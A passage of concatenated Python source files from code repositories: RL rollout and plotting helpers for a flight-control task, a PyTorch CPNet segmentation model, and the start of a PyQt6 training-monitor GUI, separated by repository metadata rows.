    :param num_trials: number of trajectories to generate
    :return: parallel lists of observations, actions, rewards, done flags
    """
    observations, actions, rewards, dones = [], [], [], []
    for _ in range(num_trials):
        obs = env.reset()
        done = False
        while not done:
            action, _ = model.predict(obs, deterministic=True)
            observations.append(obs)
            actions.append(action)
            obs, reward, done, _ = env.step(action)
            rewards.append(reward)
            dones.append(done)
    return observations, actions, rewards, dones
def run_network_stochastic(model, env, num_eps):
    """Run the policy stochastically for num_eps episodes and plot terminal
    statistics.

    Prints the fraction of episodes the environment flags as successful and
    shows histograms of terminal time / altitude / velocity / FPA.

    :param num_eps: number of episodes to use
    :param env: RL environment used for training
    :param model: RL model generated by training
    :return:
    """
    success_count = 0  # episodes within fpa tolerance that reach target alt
    terminal = {'time': [], 'alt': [], 'vel': [], 'fpa': []}
    for _ in range(num_eps):
        obs = env.reset()
        done = False
        while not done:
            action, _ = model.predict(obs, deterministic=False)
            obs, rewards, done, info = env.step(action)
        terminal['time'].append(obs[0])
        terminal['alt'].append(obs[1])
        terminal['vel'].append(obs[2])
        terminal['fpa'].append(obs[3] * 180 / np.pi)  # rad -> deg
        if env.agent.success:
            success_count += 1
    print("success percentage ", success_count / num_eps)
    # TODO make this into a function for post processing
    num_bins = 20
    fig, axs = plt.subplots(2, 2)
    panels = [('time', 'Final Time (s)'), ('alt', 'Terminal Alt (m)'),
              ('vel', 'Terminal Vel (m/s)'), ('fpa', 'Terminal FPA (deg)')]
    for ax, (key, title) in zip(axs.flat, panels):
        counts, bins = np.histogram(terminal[key], bins=num_bins)
        ax.hist(bins[:-1], bins, weights=counts)
        ax.set_title(title)
    fig.tight_layout()
    plt.show()
def run_network_save(initial_state, env, model, file=None, dir=None):
    """Roll out the policy deterministically and persist the run data.

    :param initial_state: initial state of the agent
    :param env: RL environment used for training
    :param model: RL model generated by training
    :param file: filename for trajectory, time, and control data
    :param dir: folder directory that receives the saved run data
    :return:
    """
    obs = env.reset(initial_state=initial_state)
    done = False
    while not done:
        action, _ = model.predict(obs, deterministic=True)
        obs, _, done, _ = env.step(action)
    env.agent.save_run_data(file=file, save=initial_state, dir=dir)
def run_network_control(initial_state, env, model, save=None):
    """Roll out the policy deterministically, then plot the control history.

    :param initial_state: initial state of the agent
    :param env: RL environment used for training
    :param model: RL model generated by training
    :param save: forwarded to the agent's plot_control
    :return:
    """
    obs = env.reset(initial_state=initial_state)
    done = False
    while not done:
        action, _ = model.predict(obs, deterministic=True)
        obs, _, done, _ = env.step(action)
    env.agent.plot_control(style='segmented', save=save)
def network_excel(initial_state, env, model, filename):
    """Roll out the policy deterministically and dump the run to <filename>.csv.

    The CSV holds one row per non-terminal step with Time / Altitude /
    Velocity / FPA observations and the action taken from that state.

    Bug fix: the per-step reward returned by env.step() was discarded, so
    the intermediate 'reward' column was always the initial 0.0; it is now
    recorded from the environment.

    :param initial_state: initial state of the agent
    :param env: RL environment used for training
    :param model: RL model generated by training
    :param filename: name of the file to save (".csv" is appended)
    """
    obs = env.reset(initial_state=initial_state)
    done = False
    reward = 0.
    times, alts, vels, fpas = [obs[0]], [obs[1]], [obs[2]], [obs[3]]
    rewards, dones, actions = [reward], [done], []
    while not done:
        action, _ = model.predict(obs, deterministic=True)
        obs, reward, done, _ = env.step(action)
        actions.append(action)
        times.append(obs[0])
        alts.append(obs[1])
        vels.append(obs[2])
        fpas.append(obs[3])
        rewards.append(reward)
        dones.append(done)
    df = pd.DataFrame(data={'Time': times, 'Altitude': alts, 'Velocity': vels,
                            'FPA': fpas, 'reward': rewards, 'done': dones})
    # Keep only non-terminal rows; each of those rows has a matching action.
    Xy = df[df['done'] == False]  # noqa: E712 -- pandas elementwise comparison
    Xy = Xy[['Time', 'Altitude', 'Velocity', 'FPA']]
    Xy['Action'] = actions
    Xy.to_csv(filename + '.csv')
def run_network_success(initial_state, env, model):
    """Roll out the policy deterministically and return a terminal flag.

    Bug fix: the terminal test used bitwise `&` between an int and a float
    product -- Python precedence made it `3000 & (...)`, which raises
    TypeError at the end of every episode -- and misplaced the parenthesis
    of the rad->deg conversion. Rewritten as the boolean test the operands
    imply: the "failure" branch fires when obs[0] <= 3000 and the terminal
    FPA magnitude is within 0.25 deg.

    NOTE(review): the success/failure polarity looks inverted (in-tolerance
    FPA yields success=False); preserved as originally written -- confirm.

    :param initial_state: initial state of the agent
    :param env: RL environment used for training
    :param model: RL model generated by training
    :return: bool success flag
    """
    obs = env.reset(initial_state=initial_state)
    done = False
    success = False
    while not done:
        action, _ = model.predict(obs, deterministic=True)
        obs, _, done, _ = env.step(action)
    if obs[0] <= 3000 and abs(obs[3]) * (180 / np.pi) <= 0.25:
        success = False
    else:
        success = True
    return success
| hmdmia/HighSpeedRL | backend/utils/analysis.py | analysis.py | py | 7,951 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.argmax",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.convolve",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number... |
10525922454 | import copy
import torch
import torch.nn as nn
from .backbone import *
import numpy as np
import torch.nn.functional as F
import thop
def ConvBNReLU(in_chann, out_chann, ks, st, p=1):
    """Conv2d (no bias) -> BatchNorm2d -> in-place ReLU as one Sequential."""
    layers = [
        nn.Conv2d(in_chann, out_chann, kernel_size=ks, stride=st, padding=p, bias=False),
        nn.BatchNorm2d(out_chann),
        nn.ReLU(inplace=True),
    ]
    return nn.Sequential(*layers)
class Aggregation(nn.Module):
    """Context aggregation block.

    A 3x3 ConvBNReLU followed by two depthwise asymmetric branches
    ((1xk then kx1) and (kx1 then 1xk)) whose outputs are summed and
    passed through BatchNorm + ReLU.
    """

    def __init__(self, in_chann, out_chann, asy_ks=5):
        super(Aggregation, self).__init__()
        pad = asy_ks // 2
        self.conv = ConvBNReLU(in_chann, out_chann, 3, 1, 1)
        self.left_asymmetric = nn.Sequential(
            nn.Conv2d(out_chann, out_chann, kernel_size=(1, asy_ks), stride=1,
                      padding=(0, pad), groups=out_chann, bias=True),
            nn.Conv2d(out_chann, out_chann, kernel_size=(asy_ks, 1), stride=1,
                      padding=(pad, 0), groups=out_chann, bias=True),
        )
        self.right_asymmetric = nn.Sequential(
            nn.Conv2d(out_chann, out_chann, kernel_size=(asy_ks, 1), stride=1,
                      padding=(pad, 0), groups=out_chann, bias=True),
            nn.Conv2d(out_chann, out_chann, kernel_size=(1, asy_ks), stride=1,
                      padding=(0, pad), groups=out_chann, bias=True),
        )
        self.bn_relu = nn.Sequential(
            nn.BatchNorm2d(out_chann),
            nn.ReLU(inplace=True),
        )

    def forward(self, x):
        features = self.conv(x)
        fused = self.left_asymmetric(features) + self.right_asymmetric(features)
        return self.bn_relu(fused)
class DeepLabHead(nn.Module):
    """DeepLabV3+-style decoder fusing last / mid / low backbone features.

    NOTE(review): `last_channels` is accepted but unused; channel counts are
    hard-coded (304 = 256 last-level + 48 projected skip) -- confirm.
    """

    def __init__(self, num_classes, last_channels, mid_channels, low_channels):
        super(DeepLabHead, self).__init__()
        # 1x1 projections of the skip features down to 48 channels each.
        self.low_process = ConvBNReLU(low_channels, 48, 1, 1, 0)
        self.mid_process = ConvBNReLU(mid_channels, 48, 1, 1, 0)
        self.mid_project = ConvBNReLU(304, 256, 3, 1, 1)
        self.classifier = nn.Sequential(
            ConvBNReLU(304, 256, 3, 1, 1),
            nn.Dropout(0.1),
            nn.Conv2d(256, num_classes,
                      kernel_size=1,
                      stride=1,
                      padding=0,
                      bias=True),
        )

    def forward(self, last_feat, mid_feat, low_feat):
        low_feat = self.low_process(low_feat)
        mid_feat = self.mid_process(mid_feat)
        # Upsample the deepest features to mid resolution and fuse.
        upsampled = F.interpolate(last_feat, size=mid_feat.size()[2:],
                                  mode="bilinear", align_corners=True)
        fused_mid = self.mid_project(torch.cat([upsampled, mid_feat], dim=1))
        # Upsample again to low resolution and fuse with the low-level skip.
        fused_mid = F.interpolate(fused_mid, size=low_feat.size()[2:],
                                  mode="bilinear", align_corners=True)
        return self.classifier(torch.cat([fused_mid, low_feat], dim=1))
class CPNet(nn.Module):
    """Context Prior Network (CPNet) semantic-segmentation model.

    Learns an HW-by-HW "context prior map" over the 1/16-resolution feature
    grid that separates intra-class from inter-class context; both context
    tensors are concatenated with the backbone features before the
    classification head. In training mode, forward() also returns the
    intra-class prior map for the affinity loss.
    """

    def __init__(self, num_classes, input_channels=512,
                 prior_channels=512, prior_size=(40, 40), backend="resnet34", pretrained=True):
        super(CPNet, self).__init__()
        # Number of spatial positions (H*W) of the prior map at 1/16 scale.
        self.prior_size = np.prod(prior_size)
        self.num_classes = num_classes
        self.prior_channels = prior_channels
        # NOTE: eval() resolves the backbone constructor from the names
        # imported via `from .backbone import *` -- only safe because
        # `backend` comes from trusted code, never from user input.
        self.backbone = eval(backend)(pretrained=pretrained)  # backbone
        self.aggregation = Aggregation(input_channels, prior_channels, 11)  # feature aggregation: enriches contextual information
        # 1x1 conv producing, per position, its affinity row of the prior map.
        self.prior_conv = nn.Sequential(
            nn.Conv2d(prior_channels, self.prior_size, kernel_size=1, stride=1, bias=True),
            # nn.BatchNorm2d(self.prior_size)
        )
        self.intra_conv = ConvBNReLU(prior_channels, prior_channels, 1, 1, 0)
        self.inter_conv = ConvBNReLU(prior_channels, prior_channels, 1, 1, 0)
        self.post_process = nn.Sequential(
            ConvBNReLU(input_channels + prior_channels*2, 256, 1, 1, 0),
            ConvBNReLU(256, 256, 3, 1, 1)  # prior_channels
        )
        # without deeplab
        self.head = nn.Sequential(
            ConvBNReLU(256, 256, 3, 1, 1),  # prior_channels
            nn.Dropout(0.1),
            nn.Conv2d(256, num_classes, 1, 1, bias=True)
        )
        # with deeplab
        '''self.deeplab_head = DeepLabHead(num_classes, 256, 128, 64)'''

    def _reinit(self, input_size):
        # Rebuild the prior head for a new input resolution (backbone
        # downscales by 16, so the prior map has (input_size/16)^2 positions).
        input_size = input_size/16
        self.prior_size = int(np.prod(input_size))
        self.prior_conv = nn.Sequential(
            nn.Conv2d(self.prior_channels, self.prior_size, kernel_size=1, stride=1, bias=True),
        )

    def forward(self, x):
        feat, feat_2, feat_1 = self.backbone(x)
        h, w = feat.size()[2:]
        value = self.aggregation(feat)
        context_proir_map = self.prior_conv(value)
        # Reshape to one affinity row per spatial position: [bs, HW, HW].
        context_proir_map = context_proir_map.view(context_proir_map.size()[0], \
            -1, self.prior_size).permute(0, 2, 1)
        intra_context_proir_map = torch.sigmoid(context_proir_map)  # [bs, HW, HW], intra-class affinity
        # NOTE(review): inter map is 1 - raw logits, not 1 - sigmoid(logits);
        # this differs from the CPNet paper formulation -- confirm intended.
        inter_context_prior_map = 1 - context_proir_map  # inter-class affinity
        value = value.view(value.size()[0], value.size()[1], -1).permute(0, 2, 1).contiguous()  # [bs, C, HW] -> [bs, HW, C]
        intra_context_proir_map = F.softmax(intra_context_proir_map, dim=-1)
        intra_context = torch.matmul(intra_context_proir_map, value)  # update each position with intra-class global features
        # intra_context = intra_context.div(self.prior_size)
        intra_context = intra_context.permute(0, 2, 1).contiguous()
        intra_context = intra_context.view(intra_context.size(0), self.prior_channels, h, w)
        intra_context = self.intra_conv(intra_context)
        inter_context_prior_map = F.softmax(inter_context_prior_map, dim=-1)
        inter_context = torch.matmul(inter_context_prior_map, value)
        # inter_context = inter_context.div(self.prior_size)
        inter_context = inter_context.permute(0, 2, 1).contiguous()
        inter_context = inter_context.view(inter_context.size(0), self.prior_channels, h, w)
        inter_context = self.inter_conv(inter_context)
        # Fuse backbone features with both context streams, then classify.
        out = torch.cat([feat, intra_context, inter_context], dim=1)
        out = self.post_process(out)
        # without deeplab
        seg_out = self.head(out)
        seg_out = F.interpolate(seg_out, size=(x.size()[2], x.size()[3]), mode="bilinear", align_corners=True)
        # with deeplab
        '''seg_out = self.deeplab_head(out, feat_2, feat_1)
        seg_out = F.interpolate(seg_out, size=x.size()[2:], mode="bilinear", align_corners=True)'''
        if self.training:
            # Training also returns the intra prior map for the affinity loss.
            return seg_out, intra_context_proir_map
        return seg_out
from utils.utils import get_model_infos

@get_model_infos
def cpnet(num_classes, backend="resnet34", pretrained=False):
    # Factory for a CPNet with the given backbone; wrapped by
    # get_model_infos (presumably reports model statistics -- TODO confirm).
    model = CPNet(num_classes, backend=backend, pretrained=pretrained)
    return model
if __name__ == "__main__":
model = CPNet(20)
inputs = torch.randn(1, 3, 640, 640)
seg_out, context_map = model(inputs)
print("segout: ", seg_out.size(), ' context_map siz: ', context_map.size())
# labels = torch.randint(0, 20, (1, 640, 640)).long()
# model._get_loss(context_map, labels, [80, 80])
'''model = cpnet_resnet34(4, pretrained=False)
feat = torch.randn(1, 3, 640, 640)
out, context_proir_map = model(feat)
print(out.size(), " context_proir_map size: ", context_proir_map.size())''' | yadongJiang/semantic-segmentation-projects | libs/cpnet/model.py | model.py | py | 7,478 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "torch.nn.Sequential",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_num... |
152948829 | import PyQt6
import pandas as pd
from PyQt6 import QtWidgets, QtGui, QtCore
from PyQt6.QtCore import pyqtSignal, pyqtSlot, Qt
from PyQt6.QtWidgets import QListWidget, QFileDialog
from matplotlib.backends.backend_qtagg import FigureCanvasQTAgg
from matplotlib.figure import Figure
from gui.HyperParamterWidget import HyperParameterWidget
from gui.HyperParamterWidgetBool import HyperParameterWidgetBool
from gui.Slider import Slider
from model.profiles.builder.data_readers import DataReaders
from model.profiles.builder.losses import Losses
from model.profiles.builder.models import Models
from model.profiles.builder.optimizers import Optimizers
from model.profiles.training_configuration import TrainingConfiguration
from model.profiles.training_profile import TrainingProfile
from model.profiles.training_session import Session
from utils.ConfigChangedArgs import ConfigChangedArgs
from utils.ListChangedArgs import ListChangedArgs
from utils.gui_tools import add_vlayout
from utils.stat_tools import calc_profile_f1, calc_data_stats
class CustomCanvas(FigureCanvasQTAgg):
    """Matplotlib Qt canvas with a single pre-created axes (``ax_loss``)."""

    def __init__(self, parent=None, width=5, height=4, dpi=200):
        # Build the figure first so the axes exists before the Qt canvas
        # wraps it; `parent` is accepted for Qt-style construction.
        figure = Figure(figsize=(width, height), dpi=dpi)
        self.ax_loss = figure.add_subplot()
        super().__init__(figure)
class MainWindow(QtWidgets.QMainWindow):
# --- signals -------------------------
start_multi_fit = pyqtSignal(int, int)
train_signal = pyqtSignal()
close_signal = pyqtSignal()
config_changed = pyqtSignal(ConfigChangedArgs)
create_profile = pyqtSignal()
profile_selection_changed = pyqtSignal(int)
select_session = pyqtSignal(int)
export_model = pyqtSignal(int)
clear_session = pyqtSignal()
signal_remove_session = pyqtSignal(int)
signal_clone_model = pyqtSignal(str)
signal_clone_data = pyqtSignal(str)
signal_validate = pyqtSignal()
# --- slots ---------------------------
@pyqtSlot(bool)
def on_export_state_changed(self, running):
self.gb_state.setEnabled(not running)
@pyqtSlot(list)
def profiles_updates(self, profiles):
self.plot_accuracies(profiles)
@pyqtSlot(int, int)
def job_time_update(self, sec, epoch):
    """Display the estimated remaining fit time (h/min/s) and the
    seconds-per-epoch estimate in the time label.

    Fix: the original bound the name `min`, shadowing the builtin;
    divmod expresses the same h/min/s split without that hazard.
    """
    minutes, seconds = divmod(int(sec), 60)
    hours, minutes = divmod(minutes, 60)
    self.time_label.setText(f"remaining: ~{hours}h {minutes}min {seconds}s (~{epoch} s per epoch)")
@pyqtSlot(bool)
def fit_status_changed(self, active):
if active:
self.fit_button.setText("Stop")
else:
self.fit_button.setText("Fit")
self.time_label.setText("")
@pyqtSlot(Session)
def session_changed(self, args):
if args.type == ListChangedArgs.ADDED:
self.session_list.addItem(args.data.get_name())
if args.type == ListChangedArgs.UPDATED:
self.update_session(args.data)
if args.index != -1 and self.session_list.count() >= args.index:
self.session_list.item(args.index).setText(args.data.get_name())
if args.type == ListChangedArgs.REMOVED:
self.session_list.takeItem(args.index)
if args.type == ListChangedArgs.RESET:
self.session_list.clear()
for s in args.data:
self.session_list.addItem(s.get_name())
@pyqtSlot(TrainingProfile)
def profiles_added(self, profile):
self.profile_list.addItem(profile.name)
checkbox = QtWidgets.QCheckBox(profile.name)
checkbox.setChecked(False)
checkbox.stateChanged.connect(self.acc_cb_state_changed)
self.acc_layout.addWidget(checkbox)
self.acc_cbs.append(checkbox)
@pyqtSlot(TrainingConfiguration)
def config_update(self, config):
self.refresh_config_category('opt', config.optimizer, self._opt_param_widgets, self.opt_layout, self.optimizer_cb)
self.refresh_config_category('loss', config.loss, self._loss_param_widgets, self.loss_layout, self.loss_cb)
self.refresh_config_category('model', config.model, self._model_param_widgets, self.model_layout, self.model_cb)
self.refresh_config_category('reader', config.data, self._data_param_widgets, self.data_layout, self.data_cb)
self.config_name_label.setText(config.get_name())
self.create_profile_button.setEnabled(config.is_complete())
@pyqtSlot(int, TrainingProfile)
def profile_selected(self, i, profile):
self.profile_list.setCurrentRow(i)
@pyqtSlot(int, int, int, bool)
def on_batch_complete(self, i, cnt, remaining, training):
if training:
self.label_phase.setText('training')
else:
self.label_phase.setText('validation')
if i < 0:
self.label_batch.setText('preparing')
self.label_time.setText('')
elif i < cnt:
self.label_batch.setText(f'current batch: {i}/{cnt}')
self.label_time.setText(f'time remaining: ~{remaining} s')
else:
self.label_batch.setText('calculating metrics')
self.label_time.setText('')
# --- handler --------------------------
def button_clone_data_clicked(self):
    """Open a file dialog and emit the chosen data file path for cloning."""
    dlg = QFileDialog()
    # dlg.setFileMode(QFileDialog.AnyFile)
    # dlg.setFilter("Numpy Data File (*.npy)")
    # Bug fix: PyQt6 removed the Qt4-era `exec_()` alias; the dialog's
    # modal loop is started with `exec()`.
    if dlg.exec():
        filenames = dlg.selectedFiles()
        if filenames:
            self.signal_clone_data.emit(filenames[0])
def button_clone_model_clicked(self):
filename = QFileDialog.getOpenFileName(self, 'Open file', filter="Checkpoint (*.ckp)")
self.signal_clone_model.emit(filename[0])
def remove_profile_clicked(self):
    """Emit the currently selected profile row for removal.

    Bug fix: `currentRow` was emitted without parentheses, passing the
    bound method object instead of the row index to a pyqtSignal(int).
    """
    self.signal_remove_session.emit(self.profile_list.currentRow())
def acc_cb_state_changed(self, checked):
self.plot_accuracies(self._profiles)
def session_selection_changed(self, index):
self.select_session.emit(index)
def model_selection_changed(self, txt):
self.config_changed.emit(ConfigChangedArgs('model', txt, None, None))
def opt_selection_changed(self, txt):
self.config_changed.emit(ConfigChangedArgs('opt', txt, None, None))
def data_selection_changed(self, txt):
self.config_changed.emit(ConfigChangedArgs('reader', txt, None, None))
def loss_selection_changed(self, txt):
self.config_changed.emit(ConfigChangedArgs('loss', txt, None, None))
def hp_changed(self, category, index, value):
self.config_changed.emit(ConfigChangedArgs(category, None, index, value))
def closeEvent(self, event):
self.close_signal.emit()
def create_profile_clicked(self):
self.create_profile.emit()
def change_profile_selection(self):
self.profile_selection_changed.emit(self.profile_list.currentRow())
def click_fit(self):
self.start_multi_fit.emit(self.session_slider.value, self.epoch_slider.value)
# --- private methods ------------------
def update_session(self, session):
self.plot_session(session)
if session.epoch_cnt() == 0:
return
self.label_current.setText(f'cur: (c: {round(session.f1_crack[-1],3)}, i: {round(session.f1_inactive[-1],3)}, m: {round(session.f1[-1],3)})')
self.label_best_mean.setText(f'best m: ({round(session.best_f1_m[0],3)}, {round(session.best_f1_m[1],3)}, {round(session.best_f1_m[2],3)})')
self.label_best_crack.setText(f'best c: ({round(session.best_f1_c[0],3)}, {round(session.best_f1_c[1],3)}, {round(session.best_f1_c[2],3)})')
self.label_best_inactive.setText(f'best i: ({round(session.best_f1_i[0],3)}, {round(session.best_f1_i[1],3)}, {round(session.best_f1_i[2],3)})')
stats = calc_data_stats(session)
self.label_data_stat_t_nbr.setText(str(stats[0][0]))
self.label_data_stat_v_nbr.setText(str(stats[0][1]))
self.label_data_stat_t_f.setText(str(stats[1][0]))
self.label_data_stat_v_f.setText(str(stats[1][1]))
self.label_data_stat_t_c.setText(str(stats[2][0]))
self.label_data_stat_v_c.setText(str(stats[2][1]))
self.label_data_stat_t_i.setText(str(stats[3][0]))
self.label_data_stat_v_i.setText(str(stats[3][1]))
self.label_data_stat_t_b.setText(str(stats[4][0]))
self.label_data_stat_v_b.setText(str(stats[4][1]))
def refresh_config_category(self, cat, descriptor, widgets, layout, combo_box):
# remove hyperparameters if descriptor is None, doesn't contain hp or type selection was changed
if descriptor is None or descriptor.hyperparams is None \
or (combo_box is not None and combo_box.currentText() != descriptor.name)\
or len(widgets) != len(descriptor.hyperparams):
for w in widgets:
w.value_changed.disconnect(self.hp_changed)
layout.removeWidget(w)
widgets.clear()
# reset combo_box and return if descriptor is None
if descriptor is None:
combo_box.setCurrentIndex(-1)
return
if combo_box is not None:
combo_box.setCurrentText(descriptor.name)
if descriptor.hyperparams is None:
return
if len(descriptor.hyperparams) != len(widgets):
for i, param in enumerate(descriptor.hyperparams):
if param.type == 'bool':
pw = HyperParameterWidgetBool(cat, i, param)
else:
pw = HyperParameterWidget(cat, i, param)
pw.value_changed.connect(self.hp_changed)
layout.addWidget(pw)
widgets.append(pw)
else:
for i, param in enumerate(descriptor.hyperparams):
widgets[i].set_value(param.get_value())
def plot_session(self, session):
self.canvas.ax_loss.clear()
self.last_session = session
tr_loss = session.training_loss
val_loss = session.eval_loss
if len(tr_loss) > 15:
tr_loss = tr_loss[5:]
val_loss = val_loss[5:]
#if len(tr_loss) > 10:
# tr_loss = tr_loss[10:]
# val_loss = val_loss[10:]
training_loss = pd.Series(tr_loss).rolling(self.rolling_average).mean()
eval_loss = pd.Series(val_loss).rolling(self.rolling_average).mean()
self.canvas.ax_loss.plot(training_loss, label='training loss')
self.canvas.ax_loss.plot(eval_loss, label='test loss')
self.canvas.ax_loss.legend()
self.canvas.draw()
def plot_accuracies(self, profiles):
if profiles is None:
return
self._profiles = profiles
self.acc_ax.clear()
# f1 mean
once = False
for i, p in enumerate(profiles):
if not self.acc_cbs[i].isChecked():
continue
once = True
f1, f1_c, f1_i = calc_profile_f1(p)
ts = pd.Series(f1)
data = ts.rolling(self.rolling_average).mean()
self.acc_ax.plot(data, label=f'{p.name} (mean)')
if not self.plot_only_mean:
ts = pd.Series(f1_c)
data = ts.rolling(self.rolling_average).mean()
self.acc_ax.plot(data, label=f'{p.name} (crack)')
ts = pd.Series(f1_i)
data = ts.rolling(self.rolling_average).mean()
self.acc_ax.plot(data, label=f'{p.name} (inactive)')
if once:
self.acc_ax.legend()
self.acc_canvas.draw()
def smooth_slider_value_changed(self, value):
    """Adopt the new rolling-average window and redraw both plots."""
    self.rolling_average = int(value)
    self.plot_accuracies(self._profiles)
    if self.last_session is not None:
        # Redraw the loss plot for the most recently shown session.
        self.plot_session(self.last_session)
def epoch_slider_value_changed(self, value):
self.acc_cnt = int(value)
self.plot_accuracies(self._profiles)
def button_export_current(self):
self.export_model.emit(0)
def button_export_best_m(self):
self.export_model.emit(3)
def button_export_best_c(self):
self.export_model.emit(1)
def button_export_best_i(self):
self.export_model.emit(2)
def button_clear_session_clicked(self):
self.clear_session.emit()
def click_validate(self):
self.signal_validate.emit()
# --- construction ---------------------
def load_profile_builder(self):
self.loss_cb.addItems(Losses.losses)
self.optimizer_cb.addItems(Optimizers.optimizers)
self.model_cb.addItems(Models.models)
self.data_cb.addItems(DataReaders.reader)
def __init__(self):
super(MainWindow, self).__init__()
self.plot_only_mean = False
self.rolling_average = 1
self.acc_cnt = 50
self._profiles = None
self._opt_param_widgets = []
self._model_param_widgets = []
self._data_param_widgets = []
self._loss_param_widgets = []
self.acc_figure = Figure()
self.acc_ax = self.acc_figure.add_subplot()
self.last_session = None
# new configuration widgets
self.model_layout = None
self.loss_layout = None
self.opt_layout = None
self.data_layout = None
self.config_name_label = None
self.create_profile_button = None
self.model_cb = None
self.loss_cb = None
self.optimizer_cb = None
# profile widgets
self.profile_list = None
self.label_data_stat_t_nbr = None
self.label_data_stat_t_f = None
self.label_data_stat_t_c = None
self.label_data_stat_t_i = None
self.label_data_stat_t_b = None
self.label_data_stat_v_nbr = None
self.label_data_stat_v_f = None
self.label_data_stat_v_c = None
self.label_data_stat_v_i = None
self.label_data_stat_v_b = None
# session widgets
self.session_list = None
self.session_slider = None
self.epoch_slider = None
self.fit_button = None
self.time_label = None
self.label_current = None
self.label_best_mean = None
self.label_best_crack = None
self.label_best_inactive = None
self.gb_state = None
self.label_batch = None
self.label_phase = None
self.label_time = None
# monitoring widgets
self.acc_canvas = None
self.canvas = None
self.profile_acc_check_gb = None
self.acc_layout = None
self.acc_cbs = []
self.button_clone_model = None
self.button_clone_data = None
self.init_widgets()
# --- horizontal main layout -----
# ---------------------------------
self.load_profile_builder()
def init_config_widgets(self, layout):
# config_layout
# --- declarations
gb_model = QtWidgets.QGroupBox("Model")
self.model_layout = QtWidgets.QVBoxLayout()
gb_loss = QtWidgets.QGroupBox("Loss")
self.loss_layout = QtWidgets.QVBoxLayout()
gb_opt = QtWidgets.QGroupBox("Optimizer")
self.opt_layout = QtWidgets.QVBoxLayout()
gb_data = QtWidgets.QGroupBox("Data")
self.data_layout = QtWidgets.QVBoxLayout()
placeholder = QtWidgets.QWidget()
self.config_name_label = QtWidgets.QLabel()
self.create_profile_button = QtWidgets.QPushButton("Create Profile")
self.model_cb = QtWidgets.QComboBox() # model selection
self.loss_cb = QtWidgets.QComboBox() # loss selection
self.optimizer_cb = QtWidgets.QComboBox() # optimizer selection
self.data_cb = QtWidgets.QComboBox() # model selection
# --- layout
layout.addWidget(gb_model)
self.model_layout.addWidget(self.model_cb)
layout.addWidget(gb_loss)
self.loss_layout.addWidget(self.loss_cb)
layout.addWidget(gb_opt)
self.opt_layout.addWidget(self.optimizer_cb)
layout.addWidget(gb_data)
self.data_layout.addWidget(self.data_cb)
layout.addWidget(placeholder)
layout.addWidget(self.config_name_label)
layout.addWidget(self.create_profile_button)
# --- initialization
gb_model.setLayout(self.model_layout)
gb_loss.setLayout(self.loss_layout)
gb_opt.setLayout(self.opt_layout)
gb_data.setLayout(self.data_layout)
placeholder.setSizePolicy(QtWidgets.QSizePolicy.Policy.Maximum, QtWidgets.QSizePolicy.Policy.Expanding)
self.create_profile_button.setEnabled(False)
self.create_profile_button.clicked.connect(self.create_profile_clicked)
self.model_cb.currentTextChanged.connect(self.model_selection_changed)
self.loss_cb.currentTextChanged.connect(self.loss_selection_changed)
self.optimizer_cb.currentTextChanged.connect(self.opt_selection_changed)
self.data_cb.currentTextChanged.connect(self.data_selection_changed)
def init_profile_widgets(self, layout):
# profile layout
# --- declarations
self.profile_list = QListWidget()
button_remove = QtWidgets.QPushButton('Remove')
label = QtWidgets.QLabel("Training Profiles")
# self.acc_canvas = FigureCanvasQTAgg(self.acc_figure)
gb_data = QtWidgets.QGroupBox('Session Data')
data_layout = QtWidgets.QGridLayout(gb_data)
label_r0 = QtWidgets.QLabel('t')
label_r1 = QtWidgets.QLabel('v')
label_c0 = QtWidgets.QLabel('#')
label_c1 = QtWidgets.QLabel('#f')
label_c2 = QtWidgets.QLabel('#c')
label_c3 = QtWidgets.QLabel('#i')
label_c4 = QtWidgets.QLabel('#b')
self.label_data_stat_t_nbr = QtWidgets.QLabel('0')
self.label_data_stat_t_f = QtWidgets.QLabel('0')
self.label_data_stat_t_c = QtWidgets.QLabel('0')
self.label_data_stat_t_i = QtWidgets.QLabel('0')
self.label_data_stat_t_b = QtWidgets.QLabel('0')
self.label_data_stat_v_nbr = QtWidgets.QLabel('0')
self.label_data_stat_v_f = QtWidgets.QLabel('0')
self.label_data_stat_v_c = QtWidgets.QLabel('0')
self.label_data_stat_v_i = QtWidgets.QLabel('0')
self.label_data_stat_v_b = QtWidgets.QLabel('0')
# --- layout
layout.addWidget(label)
layout.addWidget(self.profile_list)
layout.addWidget(button_remove)
layout.addWidget(gb_data)
data_layout.addWidget(label_r0, 0, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_r1, 0, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c0, 1, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c1, 2, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c2, 3, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c3, 4, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(label_c4, 5, 0, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_nbr, 1, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_f, 2, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_c, 3, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_i, 4, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_t_b, 5, 1, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_nbr, 1, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_f, 2, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
data_layout.addWidget(self.label_data_stat_v_c, 3, 2, alignment=QtCore.Qt.AlignmentFlag.AlignCenter)
